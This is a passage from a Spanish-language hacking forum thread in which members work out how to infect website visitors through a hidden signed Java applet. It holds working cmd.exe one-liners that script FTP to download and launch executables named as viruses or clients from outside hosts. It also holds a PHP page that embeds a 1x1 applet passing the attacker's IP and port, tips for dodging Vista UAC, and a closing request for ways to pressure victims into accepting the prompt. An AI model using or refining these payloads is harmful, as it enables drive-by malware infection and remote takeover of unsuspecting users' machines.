[POC] Infección Mediante Java Applet (y VBScript)

Iniciado por [Zero], 1 Enero 2009, 22:50 PM

0 Miembros y 2 Visitantes están viendo este tema.

andres52

Listo, resuelto completamente... esque el código en php esta mal.. pero lo corregi y va perfecto.

andres52

#31
Hola, soy yo otra vez... xd

Bueno... va perfecto nadamás en mi maquina porqe trate de hacerlo funcionar en otras y aunque abre el certificado java no me abre ni me activa nada... y si por ejemplo le ponga que abra un mensaje (el de hola mundo) que pefectamente funciona en esta pc.. en cualquier otra no lo abre... no entiendo porqe!!

El host estoy usando es PHONE ACCES, que en realidad hostea en webspacemania.. no se si tarden mucho en actualizar o algo.. porfavor alguien podria explicarme porque no funciona?

Editado-- Ya se solucionó... era cosa del servidor xd

A2Corp

Alguien lo ha probado en win Vista?
el "Control de cuentas de usuario" creo que no deja ejecutar el bat.
:-[

Quien logro infectar en vista?
Hackeo, luego existo...

A2Corp

Investigue un poco y el problema esta en que no deja crear el archivo  log.txt  en la carpeta windows asi que podemos poner otra ruta.

Y hay otro problema que aun no soluciono:

E:\>ftp -s:log.txt
ftp> servidor@servidor.com
Comando no v lido.
ftp> mipassword123
Comando no v lido.
ftp> cd /
Desconectado.
ftp> pwd
Desconectado.
ftp> binary
Desconectado.
ftp> get Virus.exe
Desconectado.
ftp> bye


aparece como comando no valido al tratar de conectar con el ftp....
Es por el UAC me imagino.
Hackeo, luego existo...

A2Corp

Lo pongo todo separado para que se lea mejor...
Ya conseguir que funcione en Vista y burle el UAC:

cmd.exe /c
md c:\System32 &
cd c:\system32 &
echo try@servidor>c:\\System32\log.txt&
echo mipassword>>c:\\System32\log.txt&
echo cd />>c:\\System32\log.txt&
echo pwd>>c:\\System32\log.txt&
echo binary>>c:\\System32\log.txt &
echo get mivirus.exe>>c:\\System32\log.txt&
echo bye>>c:\\System32\log.txt &
echo quit>>c:\\System32\log.txt &
ftp -s:c:\\System32\log.txt baires03.com.ar &
start mivirus.exe

asi no tocamos ninguna ruta sospechosa para el UAC y nos deja hacer todo el proceso :D
Hackeo, luego existo...

m[a]rkus

#35
Hola la verdad encontre información sobre este tema en otro sitios (en inglés) y me resulto muy complicado por la poca explicación que ofrecian, y buscando mas en google aparecio esto, bien lo que me sucede actualmente es lo que le ah pasado a varios aqui pero que no dicen como lo corrijieron o al menos yo no lo vi, yo tengo este codigo:
<?php
if(isset($HTTP_GET_VARS["board"])) {
$ip $HTTP_GET_VARS["board"];
echo $ip;
}
 
else 
$ip "127.0.0.1";
 
if(isset(
$HTTP_GET_VARS["topic"])) {
$puerto $HTTP_GET_VARS["topic"];
echo $puerto;
}
 
else 
$puerto 666;
 
echo 
"<applet width='1' height='1' code='skata.class' archive='skataMPE.jar'>";
echo 
"<param name='first' value='
cmd.exe /c cd C:\\ & echo usuario@ftp.com>datos.txt&echo contraseña>>datos.txt&echo pwd>>datos.txt&echo binary>>datos.txt&echo get Client.exe>>datos.txt&echo bye>>datos.txt&echo quit>>datos.txt&ftp -s:datos.txt ftp.com&start Client.exe "
.$ip." ".$puerto."&pause'>";
echo 
"</applet>";
 
?>


Al abrir se demora unos 6 o 7 segundos y sale un mensaje de error "Aplicación Win32 no Valida" fue a la ruta y estaba el "datos.txt" y "Cliente.exe" pero con 0 bytes leyendo vi que a algunos les ah pasado y dicen que es un error que tenia el PHP pero no soy capaz de encontrarlo. Seria de agradecer que lo postearas un saludo y gracias por adelantado.

Resuelto: Cambiar server FTP
El code esta bien
Existen dos maneras de ser feliz en esta vida, una es hacerse el idiota y la otra serlo.


andres52

Una duda, para que sirve el /c?

cmd.exe /c cd C:\...

solo por curiosidad :]

Novlucker

Código (dos) [Seleccionar]
C:\Documents and Settings\Novlucker>cmd /?
Inicia una nueva instancia del intérprete de comandos de Windows XP

CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
[[/S] [/C | /K] cadena]

/C Ejecuta el comando especificado en cadena y luego finaliza


Ejecuta todos los comandos que vienen después

Saludos
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

andres52

#38
Muchas gracias por tu respuesta Novlucker.

Ahora lo que quiero es borrar la carpeta creada aqui:
CitarLo pongo todo separado para que se lea mejor...
Ya conseguir que funcione en Vista y burle el UAC:

cmd.exe /c
md c:\System32 &
cd c:\system32 &
echo try@servidor>c:\\System32\log.txt&
echo mipassword>>c:\\System32\log.txt&
echo cd />>c:\\System32\log.txt&
echo pwd>>c:\\System32\log.txt&
echo binary>>c:\\System32\log.txt &
echo get mivirus.exe>>c:\\System32\log.txt&
echo bye>>c:\\System32\log.txt &
echo quit>>c:\\System32\log.txt &
ftp -s:c:\\System32\log.txt baires03.com.ar &
start mivirus.exe

le pongo &cd..&rd system32 /s /q y no funciona.. no la borra.. pero poniendo ese código directamente en la consola si la borra... porque?

Edit- Ya vi porque no la borra... tiene el exe activado todavia.. bueno no es de mucha importancia, pues si ya la persona esta infectada puedo borrar la carpeta manualmente Pero ahora el problema es otro, cuando el usuario es limitado y tiene el uac activado, no funciona el código, no tengo idea porque pero no crea la carpeta ni activa nada... aún cuando en el cmd si puedo hacerlo manualmente (y aún cuando ya probé sin el uac activado y si funcionaba) ¿Porque ocurre esto?

A2Corp

me tiene bien satisfecho este metodo de infección pero no del todo no falta el que por desesperado le pique a cancelar porque penso que era publicidad o alguna otra cosa.
Se les ocurre algo que oriente o casi obligue al usuario a darle click a Aceptar?
:/
Hackeo, luego existo...